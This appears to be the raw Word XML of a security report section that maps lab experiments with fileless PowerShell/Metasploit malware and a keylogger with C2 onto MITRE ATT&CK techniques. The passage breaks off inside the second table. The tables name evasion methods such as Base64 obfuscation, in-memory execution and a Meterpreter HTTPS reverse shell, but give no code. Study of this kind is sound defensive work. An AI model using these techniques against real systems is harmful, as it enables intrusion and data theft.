        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The evaluation should analyse about how potent the malware is against current defense mechanism.</w:t>
      </w:r>
      <w:r w:rsidR="00172CA9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88D037" w14:textId="7AAE4C4D" w:rsidR="00C47A74" w:rsidRDefault="00C47A74" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In what defense cases will this malware become </w:t>
      </w:r>
      <w:r w:rsidR="00172CA9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ineffective. do for the ones that are available and actually true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FBDE84" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>8. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719EC6DB" w14:textId="6C0DC75F" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">To align the practical experiments in this report with real-world adversary behavior, the MITRE ATT&amp;CK framework was used to map each attack’s steps to corresponding </w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tactics, Techniques, and Procedures (TTPs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. This mapping validates that the malware </w:t>
      </w:r>
      <w:r w:rsidR="007044AE" w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behaviours</w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> observed during testing closely resemble those used in the wild by actual threat actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733FA2FC" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Fileless Malware (PowerShell + Metasploit)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6"/>
        <w:gridCol w:w="2716"/>
        <w:gridCol w:w="1628"/>
        <w:gridCol w:w="3456"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="188CE5ED" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5C9F3F" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B561DE9" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11C64E63" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ATT&amp;CK ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB9DE2A" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="267ABF2D" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="705D6187" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49736D3B" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Phishing (Attachment or Link)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C324D91" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1566.001/.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D6AB69" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Payload could be embedded in a macro-enabled document or script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="0F7A1D95" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E04E7A1" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D36F3DD" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30364019" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C45DE9E" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PowerShell used to execute payload in memory without writing to disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="0BAA0309" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ACD89DC" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A2EA79F" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE14B6B" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0016F462" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Base64 encoding used in payload to bypass signature detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="1E163661" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144322ED" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E9F9722" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Signed Binary Proxy Execution (Living-off-the-Land)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B75F478" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="773096CD" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Uses trusted binaries like PowerShell and WMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="03B16AE9" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5530DD1C" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E9F6C03" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Application Layer Protocol: HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FF9E0F" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D5F7FA9" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Meterpreter uses encrypted HTTPS reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="790D2E9C" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485F3181" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FAF8EF" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652C9ED8" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BD6C33E" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Payload fetched from remote HTTP server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09C21814" w14:textId="201AA3A4" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76225F0D" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Keylogger-Based Malware with C2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2888"/>
        <w:gridCol w:w="1291"/>
        <w:gridCol w:w="3456"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="350829E8" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FA560DF" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26821B43" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
